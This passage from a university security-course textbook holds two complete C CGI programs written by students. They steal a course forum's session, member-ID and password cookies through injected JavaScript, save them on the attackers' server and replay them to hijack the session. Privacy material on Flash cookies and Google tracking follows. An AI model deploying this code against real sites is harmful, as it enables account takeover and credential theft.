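            memcpy(out, p + nlen + 1, vlen);
            out[vlen] = '\0';
            return 1;
        }
        p = end;
    }
    return 0;
}
```

In a CGI program the header value would typically come from the `HTTP_COOKIE` environment variable, and the value found (a user or session ID) would then be used as the key into the website's database.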

Forum Vulnerability
We've emailed ss now, so we figure the vulnerability will be fixed soon and as such are free to release the source code for our exploit.
    /*
     * index.cgi
     *
     * Created by Ping on 17/10/08.
     */
    #define _DEFAULT_SOURCE   /* strsep() on glibc */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    #define MAX_STRING 1000
    #define FIELD_LEN  100

    void printOpening(char *title);
    char *nextNameValue(char *str, char *name, char *value);
    void stealCookie(void);
    void printCookie(char *session, char *member, char *pass);
    void printRest(void);

    int main(void) {
        /* +2 leaves room for the '&' appended below and the terminator */
        char *data = malloc(MAX_STRING + 2);
        char *orig = data;
        if (data == NULL) {
            return 1;
        }
        data[0] = '\0';
        fgets(data, MAX_STRING, stdin);   /* POST body, if there is one */
        if (data[0] == '\0') {
            /* No POST data: serve the page that collects the cookies */
            printOpening("Catch my cookies!");
            printRest();
        } else {
            /* POST data: the hidden form fields have come back to us */
            printOpening("Cookie is Stolen!!");
            strcat(data, "&");            /* terminate the last pair */
            printf("<body>\n");
            printf("<h1>Thanks!</h1>\n");
            printf("<img src='http://www.cse.unsw.edu.au/~jamesh/cgi-bin/cookie2.jpg'></img>\n");
            printf("</body>\n");

            char *name = malloc(MAX_STRING + 2);
            char *value = malloc(MAX_STRING + 2);
            char session[FIELD_LEN] = "";
            char member[FIELD_LEN] = "";
            char password[FIELD_LEN] = "";
            if (name == NULL || value == NULL) {
                free(name);
                free(value);
                free(orig);
                return 1;
            }
            name[0] = '\0';
            value[0] = '\0';

            /* snprintf truncates and always NUL-terminates */
            while ((data = nextNameValue(data, name, value)) != NULL) {
                if (strcmp(name, "id") == 0) {
                    snprintf(session, sizeof session, "%s", value);
                } else if (strcmp(name, "ie") == 0) {
                    snprintf(member, sizeof member, "%s", value);
                } else if (strcmp(name, "if") == 0) {
                    snprintf(password, sizeof password, "%s", value);
                }
            }
            free(value);
            free(name);
            printCookie(session, member, password);
        }

        printf("</html>\n");
        free(orig);
        return 0;
    }

    /* Split the next "name=value&" pair off the front of str.
     * Returns the rest of the string, or NULL when nothing is left. */
    char *nextNameValue(char *str, char *name, char *value) {
        char *ptr;
        ptr = strsep(&str, "=");
        if (ptr != NULL) {
            strcpy(name, ptr);
        }

        ptr = strsep(&str, "&");
        if (ptr != NULL) {
            strcpy(value, ptr);
        }
        return str;
    }

    /**
     * This function writes the JavaScript to steal the forum cookies.
     * The cookies are then placed into hidden fields and submitted
     * via POST back to the CGI script.
     **/
    void stealCookie(void) {
        printf("<form action=\"index.cgi\" method=\"post\">\n");
        printf("<SCRIPT LANGUAGE=\"JavaScript\">\n");
        printf("var getName = GetCookie('08s2COMP3441iBSessionID');\n");
        printf("document.writeln(\"<input type='hidden' name='id' value='\"+ getName + \"' >\");");
        printf("var getMember = GetCookie('08s2COMP3441iBMemberID');\n");
        printf("document.writeln(\"<input type='hidden' name='ie' value='\"+ getMember + \"' >\");");
        printf("var getPass = GetCookie('08s2COMP3441iBPassWord');\n");
        printf("document.writeln(\"<input type='hidden' name='if' value='\"+ getPass + \"' >\");");
        printf("document.writeln(\"<button type='submit'>Click to give kitten more Cookies</button>\");");
        printf("</SCRIPT>\n");
        printf("</form>\n");
    }

    /** Print the cookies to a file where the CGI is hosted **/
    void printCookie(char *session, char *member, char *pass) {
        FILE *identifier = fopen("current", "w");
        if (identifier == NULL) {
            return;
        }
        fprintf(identifier, "%s\n", session);
        fprintf(identifier, "%s\n", member);
        fprintf(identifier, "%s\n", pass);
        fclose(identifier);
    }

    /** Print the first page, along with the JavaScript functions we need **/
    void printOpening(char *title) {
        printf("Content-type: text/html\n\n");
        printf("<html>\n");
        printf("<head>\n");
        printf("<title>%s</title>\n", title);
        printf("<link rel=\"stylesheet\" type=\"text/css\" href=\"style.css\" />\n");
        printf("<SCRIPT LANGUAGE=\"JavaScript\">\n");
        printf("var today = new Date();\nvar expiry = new Date(today.getTime() + 365 * 24 * 60 * 60 * 1000);\n");
        printf("function getCookieVal (offset) {\n");
        printf("var endstr = document.cookie.indexOf (\";\", offset);\n");
        printf("var getName;\n");
        printf("if (endstr == -1) { endstr = document.cookie.length; }\n");
        printf("return unescape(document.cookie.substring(offset, endstr));\n");
        printf("}\n\n");
        printf("function GetCookie (name) {\n");
        printf("var arg = name + \"=\";\n");
        printf("var alen = arg.length;\n");
        printf("var clen = document.cookie.length;\n");
        printf("var i = 0;\n");
        printf("while (i < clen) {\n");
        printf("var j = i + alen;\n");
        printf("if (document.cookie.substring(i, j) == arg) {\n");
        printf("return getCookieVal (j);\n");
        printf("}\n");
        printf("i = document.cookie.indexOf(\" \", i) + 1;\n");
        printf("if (i == 0) break;\n");
        printf(" }\n");
        printf("return null;\n");
        printf("}\n");
        printf("function SetCookie (name,value,expires,path,domain,secure) {\n");
        printf("document.cookie = name + \"=\" + escape (value) +\n");
        printf("((expires) ? \"; expires=\" + expires.toGMTString() : \"\") +\n");
        printf(" ((path) ? \"; path=\" + path : \"\") +\n");
        printf(" ((domain) ? \"; domain=\" + domain : \"\") +\n");
        printf(" ((secure) ? \"; secure\" : \"\");\n");
        printf(" }\n");
        printf("</SCRIPT>\n");
        printf("</head>\n");
    }

    /** Print the cookie stealing html **/
    void printRest(void) {
        printf("<body>\n");
        printf("<h1>Can Has Cookie?</h1>\n");
        printf("<img src='http://www.cse.unsw.edu.au/~jamesh/cgi-bin/cookie.jpg'></img>\n");
        stealCookie();
        printf("</body>\n");
    }

The second script reads the saved values back from the "current" file and sets them as cookies in the browser of whoever loads the page.

    /*
     * index.cgi
     *
     * Created by Ping on 17/10/08.
     */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    #define MAX_STRING 1000
    #define FIELD_LEN  100

    void printOpening(void);
    void setIDCookie(char *userId, char *memberId, char *password);

    /* Read one line from fp into buf and strip the trailing newline.
     * Leaves buf empty if nothing could be read. */
    static void readLine(char *buf, int size, FILE *fp) {
        if (fgets(buf, size, fp) == NULL) {
            buf[0] = '\0';
        }
        buf[strcspn(buf, "\n")] = '\0';
    }

    int main(void) {
        /* "current" is the file written by the cookie stealing script */
        FILE *sessionCookie = fopen("current", "r");
        char sessionID[FIELD_LEN] = "";
        char memberID[FIELD_LEN] = "";
        char passWord[FIELD_LEN] = "";
        if (sessionCookie == NULL) {
            return 1;
        }
        readLine(sessionID, sizeof sessionID, sessionCookie);
        readLine(memberID, sizeof memberID, sessionCookie);
        readLine(passWord, sizeof passWord, sessionCookie);
        fclose(sessionCookie);

        printOpening();
        printf("<BODY>");
        setIDCookie(sessionID, memberID, passWord);
        printf("</BODY>");
        printf("</HTML>");
        return 0;
    }

    /* Emit JavaScript that installs the stolen values as forum cookies */
    void setIDCookie(char *userId, char *memberId, char *password) {
        printf("<form action=\"index.cgi\" method=\"post\">\n");
        printf("<SCRIPT LANGUAGE=\"JavaScript\">\n");
        printf("SetCookie('08s2COMP3441iBSessionID', \"%s\", expiry, \"/\");\n", userId);
        printf("SetCookie('08s2COMP3441iBMemberID', \"%s\", expiry, \"/\");\n", memberId);
        printf("SetCookie('08s2COMP3441iBPassWord', \"%s\", expiry, \"/\");\n", password);
        printf("</SCRIPT>\n");
        printf("</form>\n");
    }

    /* Print the page header, along with the JavaScript cookie helpers */
    void printOpening(void) {
        char *title = "Hello";
        printf("Content-type: text/html\n\n");
        printf("<html>\n");
        printf("<head>\n");
        printf("<title>%s</title>\n", title);
        printf("<link rel=\"stylesheet\" type=\"text/css\" href=\"style.css\" />\n");
        printf("<SCRIPT LANGUAGE=\"JavaScript\">\n");
        printf("var today = new Date();\nvar expiry = new Date(today.getTime() + 365 * 24 * 60 * 60 * 1000);\n");
        printf("function getCookieVal (offset) {\n");
        printf("var endstr = document.cookie.indexOf (\";\", offset);\n");
        printf("var getName;\n");
        printf("if (endstr == -1) { endstr = document.cookie.length; }\n");
        printf("return unescape(document.cookie.substring(offset, endstr));\n");
        printf("}\n\n");
        printf("function GetCookie (name) {\n");
        printf("var arg = name + \"=\";\n");
        printf("var alen = arg.length;\n");
        printf("var clen = document.cookie.length;\n");
        printf("var i = 0;\n");
        printf("while (i < clen) {\n");
        printf("var j = i + alen;\n");
        printf("if (document.cookie.substring(i, j) == arg) {\n");
        printf("return getCookieVal (j);\n");
        printf("}\n");
        printf("i = document.cookie.indexOf(\" \", i) + 1;\n");
        printf("if (i == 0) break;\n");
        printf(" }\n");
        printf("return null;\n");
        printf("}\n");
        printf("function SetCookie (name,value,expires,path,domain,secure) {\n");
        printf("document.cookie = name + \"=\" + escape (value) +\n");
        printf("((expires) ? \"; expires=\" + expires.toGMTString() : \"\") +\n");
        printf(" ((path) ? \"; path=\" + path : \"\") +\n");
        printf(" ((domain) ? \"; domain=\" + domain : \"\") +\n");
        printf(" ((secure) ? \"; secure\" : \"\");\n");
        printf(" }\n");
        printf("</SCRIPT>\n");
        printf("</head>\n");
    }

EXTERNAL HOSTING
A third party cookie is one which does not originate from the domain of the website being visited. These can be transferred to a user's computer via an object contained within a webpage which is not actually located in the same domain as the webpage. These objects are mostly banners placed by advertising companies. Users can be tracked by an advertising company as they browse across any pages hosting an object for that company. By tracking a user's browsing, the advertising company can build up a profile of the user and potentially use this for targeted ads. Third party cookies can be detected and blocked to differing degrees by all the modern browsers. But they are enabled by default and the user must opt out.

FLASH COOKIES
We already know about browser cookies and how they can be used to track your movements and browsing habits by saving a user ID on your hard drive. People have had privacy concerns about cookies for a long time and, largely due to these concerns, knowledge of their existence is widespread, as are the methods for disabling and deleting them. Marketers really hate this because it screws up their statistics and tracking strategies. People keep deleting their cookies (how rude)! But never fear, they have a workaround: Flash's "locally shared objects", aka flash cookies.

Flash cookies are intended to be used just like browser cookies, to store preferences and other info on users. However, a few differences set flash cookies apart from their tamer cousin the browser cookie. The first is the size of the file saved on your hard drive: browser cookies are limited to only 4 KB, whereas the default limit for flash cookies is 100 KB. Secondly, you know those expiration dates on browser cookies? No such thing with flash cookies. In effect they last forever (unless you manually delete them). However, the most important distinction stems from their relative obscurity. People simply have not heard of flash cookies, and flash cookies are not cleared when users delete their private data from within their browser. In addition, it is not even necessary to have a Flash movie, GUI, or anything visible to install and check for flash cookies. As long as the user has the Flash plugin, a flash cookie can be installed on the user's computer without them even being aware that a Flash script is running.

One especially sneaky method of using them is as a backup for browser cookies. When the website installs your browser cookie, it also installs a flash cookie. When the user deletes their browser cookies by clearing their private data from their browser, the flash cookie is left untouched. When the user revisits the website without a browser cookie, the website can check for the flash cookie and install a new browser cookie that links the user to their previous information. In effect, the browser cookie that the user deleted is reinstalled. Some people don't like this.

If you are concerned, there are several ways of preventing flash cookies:
1. Navigate to Macromedia's settings manager and set your privacy settings so that flash cookies (locally shared objects) are restricted or prevented from installing, or
2. Right click on any Flash movie, go to settings and set your privacy settings.

To read the contents of flash cookies you need a locally shared object editor. There is a Firefox extension called Objection that does this for you. This extension can also be used to delete the flash cookies. Alternatively, you could delete them manually. They are saved by default in the following locations:
1. Linux: ~/.macromedia
2. OS X: ~/Library/Preferences/Macromedia/Flash Player
3. Windows: Macromedia\Flash Player\#SharedObjects
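The "backup cookie" trick described above comes down to a few lines of server-side logic. The following is a minimal sketch, not any real site's code: the two dicts stand in for the browser cookie jar and Flash's local shared object storage, and `handle_visit`, the `uid` key and the ID strings are all hypothetical names.

```python
def handle_visit(browser_cookies, flash_store, new_id):
    """Return the user id the site associates with this visit.

    browser_cookies and flash_store are plain dicts standing in for the
    browser cookie jar and Flash local shared object storage.
    """
    user_id = browser_cookies.get("uid")
    if user_id is None:
        # Browser cookie is missing: fall back to the flash copy if one
        # exists, otherwise treat this as a genuinely new user.
        user_id = flash_store.get("uid", new_id)
        browser_cookies["uid"] = user_id  # (re)install the browser cookie
    flash_store["uid"] = user_id  # keep the backup copy in sync
    return user_id


browser_cookies, flash_store = {}, {}

first = handle_visit(browser_cookies, flash_store, new_id="user-1001")

# The user clears private data in the browser; flash storage is untouched.
browser_cookies.clear()

second = handle_visit(browser_cookies, flash_store, new_id="user-2002")
print(first, second)
```

Both visits end up tied to the same ID, even though the user deleted the browser cookie in between. Clearing the flash storage as well is what breaks the link.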

Google

Google knows everything you do online, and most of the things you do offline.

IP Tracking
Google maintains search logs linked to IP addresses to better target ads. Additionally, Yahoo! and US Google have a "feature" with which they log every keystroke typed into the search box.

To Avoid:
Scroogle.org - One of the best ways to avoid Google's tracking measures. When you send a request to Scroogle, they randomly select one of their servers, which randomly selects a Google IP. This server then sends your request to the chosen Google IP, receives the search result, trashes all ads, cookies, etc. and returns the modified search page to you. Scroogle offers an additional service which SSL-encrypts the connection between you and them. This stops anyone between you and Scroogle from sniffing your search terms or results.
VPN/proxy - Explored in an earlier seminar/lab. Results in Google profiling your server, not you.
TOR - As explained earlier, provides anonymity.
Another search engine - Most track in similar ways, so pick the company you hate least and use their search.
Awareness - Don't search for things you don't want linked back to you. Don't vainly search for yourself or for things that could identify you.
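The scrubbing step of such a search proxy can be sketched as follows. This is a minimal illustration under stated assumptions, not Scroogle's actual implementation: the choice of which request headers to drop, the function names and the placeholder upstream addresses (taken from the reserved documentation range) are all hypothetical.

```python
import random

# Assumption: these request headers are the ones treated as identifying.
IDENTIFYING_REQUEST_HEADERS = {"cookie", "referer"}

# Placeholder upstream addresses from the documentation range 192.0.2.0/24.
UPSTREAM_IPS = ["192.0.2.10", "192.0.2.11", "192.0.2.12"]


def pick_upstream(upstream_ips, rng=random):
    """Choose a random upstream address for this request."""
    return rng.choice(upstream_ips)


def scrub_request(headers):
    """Drop identifying headers before the query is forwarded upstream."""
    return {
        name: value
        for name, value in headers.items()
        if name.lower() not in IDENTIFYING_REQUEST_HEADERS
    }


def scrub_response(headers):
    """Drop cookies set by the search engine before replying to the user."""
    return {
        name: value
        for name, value in headers.items()
        if name.lower() != "set-cookie"
    }


request_headers = {
    "Host": "www.google.com",
    "Cookie": "PREF=ID=abc123",
    "Referer": "http://example.org/",
    "Accept": "text/html",
}
response_headers = {"Content-Type": "text/html", "Set-Cookie": "PREF=ID=xyz789"}

upstream = pick_upstream(UPSTREAM_IPS)
clean_request = scrub_request(request_headers)
clean_response = scrub_response(response_headers)
print(upstream, clean_request, clean_response)
```

The search engine sees only the proxy's address and a request without cookies, and the user never receives a cookie from the search engine. Stripping ads from the result page body is a separate step that is not shown here.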

Cookie Tracking
Google also track by a cookie which contains a unique identifier. The cookie is encrypted and sent with search requests. Google servers then decrypt the ID and link it to their log. Yahoo (and sometimes Google) also return search results with URLs which redirect via Yahoo/Google servers to track follow-through.

Google claim that the cookie is required for personal settings, but this does not explain the unique identifiers. The set of all preferences is a finite set, so the cookie could contain some sort of numerical representation of your chosen settings (i.e. 1254 might be English interface, French search, strict filtering, 20 results per page and do not launch results in new window) rather than an identifier which is linked server-side to your preferences (and who knows what else). In fact, this would result in less bandwidth (shorter cookies) and less work for Google servers. Finally, preferences can be sent as arguments in the HTTP GET request (?hl=en), so the unique ID cookie is completely unnecessary.

To Avoid: Disable cookies from Google, and use the custom Google search homepage demonstrated in the seminar. Use the browser plugin Customize Google. Again, use Scroogle.

DEMO of cookie avoiding

All Google services are linked by a single user ID (Gmail account). When signed into Gmail, all Google searches are logged and linked to the account. This data can be viewed by the user and the local copy can be deleted, but there is no way for a Gmail user to delete Google's copy. In addition, other Google services (such as Google Checkout) track online purchases and link them to the user's account, which means better targeted ads: "So, you just bought an iPod, maybe you want to buy some iPod accessories now?"

To Avoid: Don't use Gmail or other Google services. Only log in when you absolutely have to, and don't have Google 'remember me on this computer'. Google sometimes allows you to tighten privacy settings with certain services. Do this.

Google Toolbar sends some of your page requests to Google servers before the browser even makes the DNS request. Google Chrome's omnibox is a keylogger: every keystroke into the omnibox is sent to Google servers, much like the Yahoo search box.

To Avoid: Pretty simple, don't use either of them.
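The argument in the cookie discussion above, that a finite set of preferences can be stored as a small number with no unique identifier, can be made concrete. The sketch below is an assumption-laden illustration: the field names and option lists are hypothetical and do not reflect Google's real preference set or cookie format.

```python
# Hypothetical preference fields and their allowed options.
FIELDS = [
    ("interface_lang", ["en", "fr", "de"]),
    ("search_lang", ["en", "fr", "de"]),
    ("filtering", ["off", "moderate", "strict"]),
    ("results_per_page", [10, 20, 50, 100]),
    ("new_window", [False, True]),
]


def encode(prefs):
    """Pack one choice per field into a single integer (mixed-radix)."""
    code = 0
    for name, options in FIELDS:
        code = code * len(options) + options.index(prefs[name])
    return code


def decode(code):
    """Recover the preference dict from the integer produced by encode()."""
    prefs = {}
    # The last field was packed last, so it is unpacked first.
    for name, options in reversed(FIELDS):
        code, index = divmod(code, len(options))
        prefs[name] = options[index]
    return prefs


prefs = {
    "interface_lang": "en",
    "search_lang": "fr",
    "filtering": "strict",
    "results_per_page": 20,
    "new_window": False,
}

cookie_value = encode(prefs)
print(cookie_value, decode(cookie_value))
```

With these fields there are only 3 x 3 x 3 x 4 x 2 = 216 possible cookie values, so every user with the same settings sends exactly the same cookie. The value restores the settings but cannot single out an individual.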

Google don't make their privacy invasion overtly invasive. They violate your privacy by being convenient and awesome. They make you WANT to give them your private data. This is a great example of social engineering.

To Avoid: Vigilance! Be suspicious of everything. If someone is offering you a really cool service for free, be VERY suspicious.

Law
If you are worried about the amount of information companies hold on you, what can you do? Not much. We made a request to Google under the Federal Privacy Act (which gives you the right to view information that an organisation holds about you). It turns out that you can only request information when your name is stored with it. If an organisation links information to an IP address (even if it's static) or an email address (as long as it's not firstName.lastName@somewhere.com) then you cannot do anything. This means you do not have the right to view information Google ties to your IP address and cookie (all the searches you have made, the websites you have visited and when you visited them). If you have allowed Google to tie search history and websites visited to your Google account then you can view the information: just go to your Google account.

The reply we received from Google:
Hi Abigail

Thanks for the follow up email. I can confirm that Google has reviewed its privacy obligations globally and the set of personal data provided on the Google Account page complies with Google's obligations under applicable laws.

Kind regards
Garry
Google Legal team

Why does it matter if a search engine stores your searches and pages visited? Stored logs can leak, and Google is not the only one that keeps them. AOL leaked a set of logs that were linked to user cookie IDs. Just ask Jerry Cat and Thelma Arnold, two of the people who were identified from their logs.

You can have a look at what you can request on the Australian Privacy Commissioner's website at http://www.privacy.gov.au/privacy_rights/ComplaintChecker/index.html

1. Information from slides downloaded from: http://www.tml.tkk.fi/Studies/T-110.498/2003summer/Slides/lecture01.pdf
TextBook (last edited 2008-11-12 15:58:46 by DijanaPopin)
